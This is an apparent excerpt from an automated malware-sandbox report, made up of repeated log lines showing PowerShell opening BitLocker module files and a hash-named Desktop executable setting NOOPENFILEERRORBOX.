                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
